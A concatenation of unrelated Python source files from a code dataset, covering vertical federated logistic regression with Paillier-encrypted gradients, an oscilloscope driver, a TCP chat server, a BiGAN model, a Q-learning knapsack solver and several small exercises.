self.provider_en_gradient_r_transfer = provider_en_gradient_r_transfer\n\n def register_gradient_procedure(self, transfer_variables):\n self._register_gradient_sync(transfer_variables.provider_weight,\n transfer_variables.provider_forward_dict,\n transfer_variables.fore_gradient,\n transfer_variables.provider_gradient_r,\n transfer_variables.provider_en_gradient_r)\n\n self._register_loss_sync(transfer_variables.provider_loss_regular)\n\n def compute_fore_gradient(self, data_instances, model_weights, offset=None):\n \"\"\"\n gradient = d.dot(x)\n Define (sigmoid(wx+b) - y) as fore_gradient\n\n \"\"\"\n # X.dot(W)+b\n half_wx = data_instances.mapValues(\n lambda v: vec_dot(v.features, model_weights.coef_) + model_weights.intercept_)\n self.forwards = half_wx\n\n for provider_forward in self.provider_forwards:\n self.forwards = self.forwards.join(provider_forward, lambda g, h: g + h)\n\n y_hat = self.forwards.mapValues(lambda p: sigmoid(p))\n\n fore_gradient = y_hat.join(data_instances, lambda y_hat, d: y_hat - d.label)\n\n return fore_gradient, y_hat\n\n def compute_forward_hess(self, data_instances, delta_s, provider_forwards):\n \"\"\"\n To compute Hessian matrix, y, s are needed.\n g = (1/N)*∑(0.25 * wx - 0.5 * y) * x\n y = ∇2^F(w_t)s_t = g' * s = (1/N)*∑(0.25 * x * s) * x\n define forward_hess = (1/N)*∑(0.25 * x * s)\n \"\"\"\n forwards = data_instances.mapValues(\n lambda v: (np.dot(v.features, delta_s.coef_) + delta_s.intercept_) * 0.25)\n for provider_forward in provider_forwards:\n forwards = forwards.join(provider_forward, lambda g, h: g + (h * 0.25))\n # forward_hess = forwards.mapValues(lambda x: 0.25 * x / sample_size)\n hess_vector = compute_gradient(data_instances, forwards, delta_s.fit_intercept)\n return forwards, np.array(hess_vector)\n\n def compute_and_aggregate_forwards(self, data_instances, model_weights,\n encrypted_calculator, batch_index, offset=None):\n raise NotImplementedError(\"Function should not be called here\")\n\n def federated_compute_gradient_and_loss(self, data_instances, cipher_operator, encrypted_calculator, model_weights,\n optimizer,\n loss_method, n_iter_, batch_index, offset=None):\n \"\"\"\n Linear model gradient core\n Step 1: get provider forwards which differ from different algorithm\n For Logistic Regression and Linear Regression: 
forwards = wx\n For Poisson Regression, forwards = exp(wx)\n\n Step 2: Compute fore_gradient: d = sigmoid(wx)-y\n\n Step 3: send encrypted fore_gradient: d = [sigmoid(wx)-y]\n\n Step 5: Compute unilateral gradient = ∑d*x,\n\n \"\"\"\n current_suffix = (n_iter_, batch_index)\n\n self.provider_forwards = self.get_provider_forward(suffix=current_suffix)\n\n self.fore_gradient, y_hat = self.compute_fore_gradient(data_instances, model_weights, offset)\n encrypted_fore_gradient = encrypted_calculator[batch_index].encrypt(self.fore_gradient)\n self.remote_fore_gradient(encrypted_fore_gradient, suffix=current_suffix)\n\n self.decrypt_provider_gradient_and_remote(cipher_operator, suffix=current_suffix)\n\n unilateral_gradient = []\n if model_weights:\n unilateral_gradient = compute_gradient(data_instances,\n self.fore_gradient,\n model_weights.fit_intercept)\n if optimizer is not None:\n unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)\n\n gradient = optimizer.apply_gradients(unilateral_gradient)\n\n loss_list = []\n loss_norm = optimizer.loss_norm(model_weights)\n if loss_norm is not None:\n provider_loss_regular = self.get_provider_loss_regular(suffix=current_suffix)\n else:\n provider_loss_regular = []\n\n # if len(self.provider_forwards) > 1:\n # LOGGER.info(\"More than one provider exist, loss is not available\")\n # else:\n y = data_instances.mapValues(lambda instance: instance.label)\n loss = loss_method.compute_loss(y, y_hat)\n\n if loss_norm is not None:\n loss += loss_norm\n for provider_loss_norm in provider_loss_regular:\n loss += provider_loss_norm\n loss_list.append(loss)\n LOGGER.debug(\"In compute_loss, loss list are: {}\".format(loss_list))\n\n return gradient, loss_list\n\n def get_provider_forward(self, suffix=tuple()):\n provider_forward = self.provider_forward_transfer.get(idx=-1, suffix=suffix)\n return provider_forward\n\n def get_provider_weight(self):\n provider_weight = self.provider_weight_transfer.get(idx=-1)\n return provider_weight\n\n def remote_fore_gradient(self, fore_gradient, suffix=tuple()):\n self.fore_gradient_transfer.remote(obj=fore_gradient, role=consts.PROVIDER, idx=-1, suffix=suffix)\n\n def decrypt_provider_gradient_and_remote(self, cipher_operator, suffix=tuple()):\n en_provider_gradient_rs = self.provider_en_gradient_r_transfer.get(idx=-1, suffix=suffix)\n # provider_grad_r = en_provider_gradient_r[0].decrypt(cipher_operator)\n for idx, en_provider_gradient_r in enumerate(en_provider_gradient_rs):\n provider_grad_r = np.array(cipher_operator.decrypt_list(en_provider_gradient_r))\n self.provider_gradient_r_transfer.remote(provider_grad_r,\n role=consts.PROVIDER,\n idx=idx,\n suffix=suffix)\n\n\nclass Provider(VertGradientBase, loss_sync.Provider):\n\n def __init__(self):\n self.forwards = None\n self.fore_gradient = None\n\n def _register_gradient_sync(self, provider_weight_transfer, provider_forward_transfer, fore_gradient_transfer,\n provider_gradient_r_transfer, provider_en_gradient_r_transfer):\n self.provider_weight_transfer = provider_weight_transfer\n self.provider_forward_transfer = provider_forward_transfer\n self.fore_gradient_transfer = fore_gradient_transfer\n self.provider_gradient_r_transfer = provider_gradient_r_transfer\n self.provider_en_gradient_r_transfer = provider_en_gradient_r_transfer\n\n def register_gradient_procedure(self, transfer_variables):\n self._register_gradient_sync(transfer_variables.provider_weight,\n transfer_variables.provider_forward_dict,\n transfer_variables.fore_gradient,\n 
transfer_variables.provider_gradient_r,\n transfer_variables.provider_en_gradient_r)\n\n self._register_loss_sync(transfer_variables.provider_loss_regular)\n\n def federated_compute_gradient_and_loss(self, data_instances, cipher_operator, encrypted_calculator,\n model_weights, optimizer, n_iter_, batch_index):\n \"\"\"\n Linear model gradient core\n Step 1: compute forwards and send to promoter : forwards = wx + b\n Step 2:get fore_gradient from promoter: d = [sigmoid(wx)-y]\n Step 3: compute gradient and add random r : gradient = (1/n)*∑(d.dot(x))\n\n \"\"\"\n current_suffix = (n_iter_, batch_index)\n self.forwards = self.compute_forwards(data_instances, model_weights)\n self.remote_provider_forward(self.forwards, suffix=current_suffix)\n fore_gradient = self.get_fore_gradient(suffix=current_suffix)\n\n unilateral_gradient = compute_gradient(data_instances,\n fore_gradient,\n model_weights.fit_intercept)\n if optimizer is not None:\n unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)\n\n r = RandomNumberGenerator(-1, 1).generate_random_number(unilateral_gradient.shape)\n # r = PaillierTensor(ori_data=r)\n # encrypted_r = r.encrypt(encrypted_calculator[batch_index])\n # en_gradient_r = encrypted_r.__add__(PaillierTensor(unilateral_gradient))\n\n encrypted_r = cipher_operator.recursive_encrypt(r)\n en_gradient_r = encrypted_r + unilateral_gradient\n\n gradient_r = self.sync_gradient_r(en_gradient_r, suffix=current_suffix)\n # gradient = gradient_r - r\n gradient = np.subtract(gradient_r, r)\n gradient = optimizer.apply_gradients(gradient)\n\n loss_regular = optimizer.loss_norm(model_weights)\n norm_r = random.uniform(-loss_regular * 0.1, loss_regular * 0.1)\n loss_regular = loss_regular + norm_r\n # if loss_regular is not None:\n # loss_regular = cipher_operator.encrypt(loss_regular)\n self.remote_loss_regular(loss_regular, suffix=current_suffix)\n\n return gradient, fore_gradient\n\n def compute_sqn_forwards(self, data_instances, delta_s, cipher_operator):\n \"\"\"\n To compute Hessian matrix, y, s are needed.\n g = (1/N)*∑(0.25 * wx - 0.5 * y) * x\n y = ∇2^F(w_t)s_t = g' * s = (1/N)*∑(0.25 * x * s) * x\n define forward_hess = ∑(0.25 * x * s)\n \"\"\"\n sqn_forwards = data_instances.mapValues(\n lambda v: cipher_operator.encrypt(np.dot(v.features, delta_s.coef_) + delta_s.intercept_))\n # forward_sum = sqn_forwards.reduce(reduce_add)\n return sqn_forwards\n\n def compute_forward_hess(self, data_instances, delta_s, forward_hess):\n \"\"\"\n To compute Hessian matrix, y, s are needed.\n g = (1/N)*∑(0.25 * wx - 0.5 * y) * x\n y = ∇2^F(w_t)s_t = g' * s = (1/N)*∑(0.25 * x * s) * x\n define forward_hess = (0.25 * x * s)\n \"\"\"\n hess_vector = compute_gradient(data_instances,\n forward_hess,\n delta_s.fit_intercept)\n return np.array(hess_vector)\n\n def compute_forwards(self, data_instances, model_weights):\n \"\"\"\n forwards = wx\n \"\"\"\n # w = model_weights.coef_.reshape(model_weights.coef_.size)\n wx = data_instances.mapValues(lambda v: vec_dot(v.features, model_weights.coef_) + model_weights.intercept_,\n need_send=True)\n return wx\n\n def remote_provider_forward(self, provider_forward, suffix=tuple()):\n self.provider_forward_transfer.remote(obj=provider_forward, role=consts.PROMOTER, idx=0, suffix=suffix)\n\n def remote_provider_weight(self, provider_weight):\n self.provider_weight_transfer.remote(obj=provider_weight, role=consts.PROMOTER, idx=0)\n\n def get_fore_gradient(self, suffix=tuple()):\n provider_forward = 
self.fore_gradient_transfer.get(idx=0, suffix=suffix)\n return provider_forward\n\n def sync_gradient_r(self, e_gradient_r, suffix=tuple()):\n self.provider_en_gradient_r_transfer.remote(obj=e_gradient_r, role=consts.PROMOTER, idx=-1, suffix=suffix)\n gradient_r = self.provider_gradient_r_transfer.get(idx=0, suffix=suffix)\n return gradient_r\n","sub_path":"kernel/components/lr/vertlr/sync/vert_lr_gradient_and_loss.py","file_name":"vert_lr_gradient_and_loss.py","file_ext":"py","file_size_in_byte":17626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"93423869","text":"\"\"\"\n\nPython Interchangeable Virtual Instrument Library\n\nCopyright (c) 2012-2016 Alex Forencich\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nfrom .agilent9000 import *\n\nclass agilentMSO9104A(agilent9000):\n \"Agilent Infiniium MSO9104A IVI oscilloscope driver\"\n\n def __init__(self, *args, **kwargs):\n self.__dict__.setdefault('_instrument_id', 'MSO9104A')\n\n super(agilentMSO9104A, self).__init__(*args, **kwargs)\n\n self._analog_channel_count = 4\n self._digital_channel_count = 16\n self._channel_count = self._analog_channel_count + self._digital_channel_count\n self._bandwidth = 1e9\n\n self._init_channels()\n self._add_method('measurement.fetch_waveform_digital', self._measurement_fetch_waveform_digital, ivi.Doc(\"\"\"description goes here\"\"\", cls, grp, '4.3.13'))\n self._add_property('acquisition.analog_sample_rate',\n self._get_acquisition_analog_sample_rate,\n self._set_acquisition_analog_sample_rate,\n None,\n ivi.Doc(\"\"\"\n Returns or sets the effective sample rate of the acquired analog waveform using the\n current configuration. 
The units are samples per second.\n \"\"\", cls, grp, '4.2.10'))\n\n def _get_acquisition_analog_sample_rate(self):\n if not self._driver_operation_simulate and not self._get_cache_valid():\n self._acquisition__analog_sample_rate = self._ask(\":acquire:srate:analog?\")\n self._set_cache_valid()\n return self._acquisition__analog_sample_rate\n\n def _set_acquisition_analog_sample_rate(self, value):\n value = float(value)\n self._acquisition_analog_sample_rate = value\n\n def _measurement_fetch_waveform_digital(self, index):\n raw_data = []\n\n if self._driver_operation_simulate:\n return list()\n\n self._write(\":waveform:byteorder msbfirst\")\n self._write(\":waveform:format ascii\")\n self._write(\":waveform:source %s\" % index)\n\n # Read preamble\n pre = self._ask(\":waveform:preamble?\").split(',')\n\n xinc = float(pre[4])\n xorg = float(pre[5])\n xref = int(float(pre[6]))\n\n# if format != 0:\n# raise UnexpectedResponseException()\n\n # Read waveform data\n raw_data.append(self._ask(':WAVeform:DATA?'))\n\n # convert string of hex values to list of hex strings\n data_list = raw_data[0].split(\",\")\n\n # convert to times\n data = [((((k-xref)*xinc) + xorg), e) for k,e in enumerate(data_list)]\n\n return data\n\n\n","sub_path":"ivi/agilent/agilentMSO9104A.py","file_name":"agilentMSO9104A.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"587848379","text":"#!/usr/bin/env python\n\nimport random\nfrom functools import reduce\n\n\"\"\"\nСоздать (программно) текстовый файл, записать в него программно набор чисел, разделенных пробелами.\nПрограмма должна подсчитывать сумму чисел в файле и выводить ее на экран.\n\"\"\"\n\nTEXT_FILE = \"task05.txt\"\n\n\ndef init_file(file_name):\n print(f\"Creating file '{file_name}' with numbers...\")\n print()\n lines_count = random.randint(1, 10)\n with open(file_name, \"w\") as t_file:\n for i in range(lines_count):\n numbers = [str(random.randint(1, 100)) for x in range(random.randint(1, 10))]\n print(\" \".join(numbers), file=t_file)\n\n\ndef calculate_sum_in_file(file_name):\n try:\n with open(file_name, \"r\") as t_file:\n total_sum = 0\n for i, line in enumerate(t_file, 1):\n sum_in_line = sum([int(x) for x in line.strip().split()])\n total_sum += sum_in_line\n print(f\"Line No {i}: '{line.strip()}'; sum '{sum_in_line}'\")\n print()\n print(f\"Total sum of numbers in file '{file_name}': {total_sum}\")\n\n except FileNotFoundError:\n print(f\"File '{TEXT_FILE}' not found\")\n exit(1)\n\n\ndef main():\n init_file(TEXT_FILE)\n calculate_sum_in_file(TEXT_FILE)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-5/task05.py","file_name":"task05.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"16010042","text":"import io\nimport re\n\n# full range(1975, 2001)\nfor i in range(1975, 2001):\n toSort = []\n # open a file to put some year's data in\n weeks = io.open(\"./data/fideTSV/weeks{}.txt\".format(i), \"w\", encoding=\"utf-8\")\n # write the header so d3 can read it in\n weeks.write(\"Name\" + \"\\t\" + \"Rating\" + \"\\t\" + \"Year\" + \"\\t\" + \"Fed\" + \"\\t\" + \"Rank\" + \"\\n\")\n # open each file\n lines = io.open(\"./data/ratings_lists/{}-01.TXT\".format(i), \"r\").readlines()\n # ignore the header\n lines = lines[4:-1]\n # loop through each player\n for player in lines:\n # capture the name\n name = 
player[re.search(\"[^\\s\\d]+(.\\S+)+\", player).start():re.search(\"[^\\s\\d]+(.\\S+)+\", player).end()]\n if \",\" in name:\n # reorder first/last name and delete the comma if necessary\n first = name[re.search(\", *\", name).end():]\n last = name[0:name.find(\",\")]\n name = first + \" \" + last\n # some names have more than one comma :(\n while \",\" in name:\n name = name.replace(\",\", \"\")\n # capture the rating\n rating = player[re.search(\"[^\\d]\\d{4}[^\\d]\", player).start() + 1:re.search(\"[^\\d]\\d{4}[^\\d]\", player).start() + 5]\n # get the year\n year = i\n # capture the country code\n fed = player[re.search(\"[A-Z]{3}\", player).start():re.search(\"[A-Z]{3}\", player).end()]\n # put all that data into a list element\n toSort.append([name, int(rating), year, fed])\n # after all the players have been added to the list, sort them according to the rating\n allSorted = sorted(toSort, key=lambda x: x[1], reverse=True)\n # once they are sorted, add a rank column\n for k in range(0, len(allSorted)):\n allSorted[k].append(k+1)\n # print(allSorted)\n # print(\"\\n\")\n for k in range(0, len(allSorted)):\n for j in range(0, len(allSorted[k])):\n # write everything to the file\n weeks.write(str(allSorted[k][j]) + \"\\t\")\n weeks.write(\"\\n\")\n","sub_path":"scripts/combine_weeks.py","file_name":"combine_weeks.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282092513","text":"import socket\n\n# 1.创建Tcp套接字\nscokfd = socket.socket()\n\n# 绑定地址\nscokfd.bind(('127.0.0.1',9999))\n\n# 设置套接字监听\nscokfd.listen(5)\n\n# 等待客户端连接\nprint('等待客户端连接...')\nconnfd,addr = scokfd.accept()\nprint('客户端地址',addr)\nwhile True:\n # 消息收发\n data = connfd.recv(1024)\n # 客户端退出,服务端recv立即返回空字符串\n if not data:\n break\n print('客户端:',data.decode())\n\n a = input('服务端:')\n n = connfd.send(a.encode())\n\n\nconnfd.close()\nscokfd.close()\n\n","sub_path":"03-pythonNet/2019-1-8/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307654815","text":"import sys\n\ndef main():\n\n\targv = sys.argv\n\targc = len(argv)\n\t\n\trankCounts = getRankCounts()\n\ttotalHands = getTotalHands(rankCounts)\n\n\trankStrings = getRankStrings()\n\tresults = getResults(rankCounts, totalHands)\n\t\n\tprintResults(rankStrings, results)\n\t\ndef getResults(rankCounts, totalHands):\n\t\n\tresults = []\n\t\n\tfor i in range(0, len(rankCounts)):\n\t\tresults.append(rankCounts[i]/totalHands)\n\t\n\treturn results\n\t\ndef printResults(rankStrings, results):\n\t\n\tfor i in range(0, len(results)):\n\t\tsys.stdout.write(\"The probability of \")\n\t\tsys.stdout.write(rankStrings[i])\n\t\tsys.stdout.write(\" is \")\n\t\tsys.stdout.write(\"{:.4f}\".format(results[i]*100))\n\t\tsys.stdout.write(\"%\\n\")\n\t\ndef getTotalHands(rankCounts):\n\tsum = 0\n\tfor i in range(0, len(rankCounts)):\n\t\tsum += rankCounts[i]\n\treturn sum\n\t\ndef getRankStrings():\n\n\trankStrings = []\n\t\n\trankStrings.append(\"nothing\")\n\trankStrings.append(\"one pair\")\n\trankStrings.append(\"two pairs\")\n\trankStrings.append(\"three of a kind\")\n\trankStrings.append(\"a straight\")\n\trankStrings.append(\"a flush\")\n\trankStrings.append(\"a full house\")\n\trankStrings.append(\"four of a kind\")\n\trankStrings.append(\"a straight flush\")\n\trankStrings.append(\"a royal flush\")\n\t\n\treturn rankStrings\n\ndef 
getRankCounts():\n\t\n\trankCounts = []\n\t\n\tfor i in range(0, 10):\n\t\trankCounts.append(0)\n\t\n\tfor line in sys.stdin:\n\t\trank = getRank(line)\n\t\trankCounts[rank] += 1\n\t\t\n\treturn rankCounts\n\ndef getRank(line):\n\tsplitLine = line.split(\",\")\n\trankString = splitLine[len(splitLine)-1]\n\trank = int(rankString)\n\treturn rank\n\t\nif __name__ == \"__main__\":\n\tmain()","sub_path":"31/poker_31.py","file_name":"poker_31.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"72056592","text":"from micropython import const\n\n# Device\nQOS = const(1)\nMAIN_DELAY = const(1000)\nSTATS_DELAY = const(60000)\nRESTORE_DELAY = const(250)\nWDT_DELAY = const(100)\nDEVICE_STATE = b\"$state\"\n\n# Device states\nSTATE_INIT = b\"init\"\nSTATE_READY = b\"ready\"\nSTATE_RECOVER = b\"recover\"\n\n# Property datatypes\nP_STRING = b\"string\"\n\n# Node\nPUBLISH_DELAY = const(20)\n\n# General\nSLASH = b\"/\"\nUNDERSCORE = b\"_\"\n\nON = b\"on\"\nOFF = b\"off\"\nTRUE = b\"true\"\nFALSE = b\"false\"\nLOCKED = b\"locked\"\nUNLOCKED = b\"unlocked\"\n","sub_path":"homie/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640984378","text":"# Network Architecture for Bigan: Generator, Discriminator, and Encoder\n\nimport torch\nimport torch.nn as nn \nimport numpy as np \nimport torch.nn.functional as F \nfrom torch.nn import Parameter as P \nimport pdb \n\n\nclass Generator(nn.Module):\n def __init__(self, z_dim):\n super(Generator, self).__init__()\n\n self.Activation = nn.ReLU(inplace=True)\n\n self.dense_net = nn.Linear(z_dim, 256*4*4)\n\n self.normalization = nn.BatchNorm2d()\n\n self.deconv1 = nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=3, stride=2, padding=1, bias=True) #4x4 --> 7x7\n\n self.deconv2 = nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=3, stride=2, bias=True) #7x7 --> 15x15\n\n self.deconv3 = nn.ConvTranspose2d(in_channels=64, out_channels=3, kernel_size=4, stride=2, bias=True) #15x15 --> 32x32\n\n\n def forward(self, z):\n\n x = self.dense_net(z)\n x = self.Activation(x)\n \n x = x.view(x.size(0), 256, 4, 4)\n\n x = self.deconv1(x)\n x = self.Activation(x)\n x = self.normalization(128)\n\n x = self.deconv2(x)\n x = self.Activation(x)\n x = self.normalization(64)\n\n x = self.deconv3(x)\n x = torch.tanh(x)\n\n return x\n\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n\n self.Activation = nn.LeakyReLU(inplace=True, negative_slope=0.2)\n\n self.normalization = nn.BatchNorm2d()\n\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=4, stride=2, bias=True)\n\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, stride=2, padding=1, bias=True)\n\n self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, stride=2, padding=1, bias=True)\n\n self.dense_net = nn.Linear(128*4*4, 1)\n\n \n def forward(self, x):\n\n d = self.conv1(x)\n d = self.Activation(d)\n d = self.normalization(d)\n\n d = self.conv2(d)\n d = self.Activation(d)\n d = self.normalization(d)\n\n d = self.conv3(d)\n d = self.Activation(d)\n\n d = d.view(d.size(0), 128*4*4)\n d = self.dense_net(d)\n\n\n return d\n\n\nclass Encoder(nn.Module):\n def __init__(self, z_dim):\n super(Enocder, self).__init__()\n\n self.Activation = nn.LeakyReLU(inplace=True, 
negative_slope=0.2)\n\n self.normalization = nn.BatchNorm2d()\n\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=64, kernel_size=4, stride=2, bias=True) #32x32 --> 14x14\n \n self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, stride=2, padding=1, bias=True) #14x14 --> 7x7\n\n self.conv3 = nn.conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1, bias=True) #7x7 --> 4x4\n\n self.dense_net = nn.Linear(256*4*4, z_dim)\n\n def forward(self, x):\n\n z = self.conv1(x)\n z = self.Activation(z)\n z = self.normalization(64)\n\n z = self.conv2(z)\n z = self.Activation(z)\n z = self.normalization(128)\n\n z = self.conv3(z)\n z = self.Activation(z)\n\n z = z.view(z.size(0), 256*4*4)\n z = self.dense_net(z)\n\n z = torch.tanh(z)\n\n return z\n\n\n\n","sub_path":"bigan/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"613469973","text":"import logging.config\nimport sys\n\n# I used this dictionary test, you would put:\n# logging.config.fileConfig('logging.conf')\n# The \"\" entry in loggers is the root logger, tutorials always \n# use \"root\" but I can't get that to work\nlogging.config.dictConfig({\n\t\"version\": 1,\n\t\"formatters\": {\n\t\t\"default\": {\n\t\t\t\"format\": \"%(asctime)s %(levelname)s %(name)s %(message)s\"\n\t\t},\n\t},\n\t\"handlers\": {\n\t\t\"console\": {\n\t\t\t\"level\": 'DEBUG',\n\t\t\t\"class\": \"logging.StreamHandler\",\n\t\t\t\"stream\": \"ext://sys.stdout\"\n\t\t}\n\t},\n\t\"loggers\": {\n\t\t__name__: {\n\t\t\t\"level\": \"DEBUG\",\n\t\t\t'formatter': 'default',\n\t\t\t\"handlers\": [\"console\"]\n\t\t}\n\t}\n})\n\ndef logger():\n\t# Get the name from the caller of this function\n\treturn logging.getLogger(sys._getframe(1).f_globals['__name__'])\n\t\nlog= logger()\nlog.info('main')\n\n#from include.ttest import test as t1\n\n#t1()\n\nfrom include.gui.ttest import test as t2\n\nt2()","sub_path":"_misc/tlog.py","file_name":"tlog.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"113448416","text":"import pandas as pd\nimport numpy as np\nfrom time import time\nimport itertools\n\nitem = pd.DataFrame(data=[[1, 1], [6, 2], [18, 5], [22, 6], [28, 7]], columns=['Value', 'Weight'])\nactions = list(range(len(item))) # actions 每一個物品是一個action\n\n\ndef check_state(Q, knapsack, actions):\n \"\"\"\n 檢查輸入的背包狀態是否在Q table中, 若無則新增\n 將該column中可執行的action設定為0, 其餘為Nan\n\n :param Q: Q table\n :param knapsack: 背包\n :param actions: 所有可執行的action\n :return: Q table\n \"\"\"\n\n if str(knapsack) not in Q.index: # knapsack表示状态, 例如现在包里有[1,2]\n # append new state to q table\n q_table_new = pd.Series([np.NAN] * len(actions), index=Q.columns, name=str(knapsack))\n # 下面是将能使用的状态设置为0, 不能使用的设置为NaN (这个很重要)\n for i in list(set(actions).difference(set(knapsack))):\n q_table_new[i] = 0\n return Q.append(q_table_new)\n else:\n return Q\n\n\ndef envReward(action, knapsack):\n \"\"\"\n 執行action, 返回reward, 下一步的狀態及done\n done表示是否完成(超過背包限制或所有物品已放完)\n\n :param action: 要執行的action\n :param knapsack: 目前的背包狀態\n :return: r, knapsack_, done\n \"\"\"\n\n limit_w = 11\n knapsack_ = knapsack + [action]\n knapsack_.sort()\n knapsack_w = np.sum([item['Weight'][i] for i in knapsack_]) # 計算目前背包內的物品重量總和\n if knapsack_w > limit_w:\n r = -10\n completed = True\n else:\n if len(knapsack_) == len(item):\n r = 100\n completed = True\n return r, knapsack_, 
completed\n r = item['Value'][action]\n completed = False\n return r, knapsack_, completed\n\n\ndef mu_policy(Q, epsilon, nA, observation, actions):\n \"\"\"\n epsilon-greedy的策略, 返回每一個動作執行的機率\n\n :param Q: Q table\n :param epsilon: epsilon\n :param nA: 所有動作的數量\n :param observation: 目前背包的狀態\n :param actions: 所有可執行的action\n :return: 每一個動作執行的概率, 一維陣列\n \"\"\"\n # 尚未執行的action\n actions_list = list(set(actions).difference(set(observation)))\n # 輸入的背包狀態中, 所有不同action獲得的累計獎勵\n action_values = Q.loc[str(observation), :]\n # 使用action_values中最大的值\n greedy_action = action_values.idxmax()\n # 設定所有動作執行概率為0\n probabilities = np.zeros(nA)\n # 設定可執行動作執行概率為(1 / len(actions_list)) * epsilon\n for i in actions_list:\n probabilities[i] = (1 / len(actions_list)) * epsilon\n # greedy_action執行概率設定為(1 / len(actions_list)) * epsilon + (1 - epsilon)\n probabilities[greedy_action] = probabilities[greedy_action] + (1 - epsilon)\n return probabilities\n\n\ndef pi_policy(Q, observation):\n \"\"\"\n greedy策略, 每次選擇能獲得最大獎勵的動作\n\n :param Q: Q table\n :param observation: 目前背包的狀態\n :return: 一維陣列, 每個動作出現的概率, 最大獎勵的動作為1\n \"\"\"\n action_values = Q.loc[str(observation), :]\n best_action = action_values.idxmax()\n return np.eye(len(action_values))[best_action]\n\n\ndef qLearning(actions, num_episodes, discount_factor=1.0, alpha=0.7, epsilon=0.2):\n \"\"\"\n Q Learning訓練\n\n :param actions: 所有可執行的action\n :param num_episodes: 訓練的迭代次數\n :param discount_factor: 衰減係數\n :param alpha: learning rate\n :param epsilon: epsilon值, 用於epsilon-greedy選擇當前最大獎勵action\n \"\"\"\n # 環境中所有物品數量\n nA = len(actions)\n\n # 初始化Q table\n Q = pd.DataFrame(columns=actions)\n\n for i_episode in range(1, num_episodes + 1):\n # 開始一輪迭代\n # 開始時背包是空的\n knapsack = []\n\n # 新增Q table column\n Q = check_state(Q, knapsack, actions)\n\n # 從實際執行的policy中選擇action\n action = np.random.choice(nA, p=mu_policy(Q, epsilon, nA, knapsack, actions))\n for t in itertools.count():\n # 執行action, 返回reward, 下一步的狀態及是否完成(超過背包限制或所有物品已放完)\n reward, next_knapsack, done = envReward(action, knapsack)\n if done:\n Q.loc[str(knapsack), action] = reward\n break\n if t > 10:\n break\n\n # 更新Q table 下一步狀態的column\n Q = check_state(Q, next_knapsack, actions)\n # 更新Q table的value\n Q.loc[str(knapsack), action] = Q.loc[str(knapsack), action] + alpha * (\n reward + discount_factor * Q.loc[str(next_knapsack), :].max() - Q.loc[str(knapsack), action])\n\n knapsack = next_knapsack\n # 選擇下一個action\n next_action = np.random.choice(nA, p=mu_policy(Q, epsilon, nA, next_knapsack, actions))\n action = next_action\n\n if i_episode % 50 == 0:\n print(\"\\rEpisode {}/{}. 
